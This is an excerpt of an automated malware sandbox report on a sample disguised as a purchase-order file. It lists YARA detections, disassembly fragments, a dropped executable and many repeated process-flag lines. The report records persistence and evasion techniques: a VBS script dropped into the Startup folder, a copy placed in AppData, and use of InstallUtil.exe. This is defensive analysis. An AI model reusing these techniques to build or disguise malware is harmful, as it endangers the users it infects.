                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: IsNestedFamANDAssem.exe, 00000005.00000002.2380281455.0000000004C98000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: IsNestedFamANDAssem.exe, 00000005.00000002.2380281455.0000000004C98000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 5.2.IsNestedFamANDAssem.exe.4803b08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-12202432_ACD_Group.pif.exe.66b0000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-12202432_ACD_Group.pif.exe.3e609a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2380281455.0000000004803000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2165084237.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2157610900.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO-12202432_ACD_Group.pif.exe PID: 3668, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: IsNestedFamANDAssem.exe PID: 2300, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_010626C0 push esp; ret 0_2_010626C9
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_05AF0A07 push es; retf 0_2_05AF0A08
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065AABEE push eax; iretd 0_2_065AAC45
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065AABE1 push es; retf 0_2_065AABEC
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065A0905 push esp; ret 0_2_065A090D
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066092E0 push eax; iretd 0_2_066095B1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06603290 push es; ret 0_2_06603340
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06606B50 push 1C065EB3h; iretd 0_2_06606BA5
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06608B10 push esp; retf 0_2_06608D59
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066AB636 pushfd ; retn 0000h0_2_066AB63B
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066AAB65 push edi; iretd 0_2_066AAB66
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A2C9D push 00000006h; iretd 0_2_066A2CC0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A2C96 push 00000006h; retf 0_2_066A2C98
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A2D01 push 00000006h; ret 0_2_066A2D1C
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A2D81 push 00000006h; iretd 0_2_066A2D94
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C5EEB push es; iretd 0_2_067C5EEC
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C2ABB pushad ; retf 0_2_067C2AC1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C61A6 push ds; iretd 0_2_067C61A7
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067DCF7B push es; iretd 0_2_067DCF7C
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_016626C0 push esp; ret 5_2_016626C9
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06090A00 push es; retf 5_2_06090A08
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C70905 push esp; ret 5_2_06C7090D
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C91913 push eax; ret 5_2_06C9191D
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD95AB push eax; iretd 5_2_06CD95B1
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD1281 push esp; retf 5_2_06CD1282
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD1277 push esp; retf 5_2_06CD127A
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD1233 push esp; retf 5_2_06CD123A
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD333B push es; ret 5_2_06CD3340
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD8C10 push esp; retf 5_2_06CD8D59
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD0DE1 push ebx; retf 5_2_06CD0DE2
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD6B9B push 1C06CBB3h; iretd 5_2_06CD6BA5
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to dropped file
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
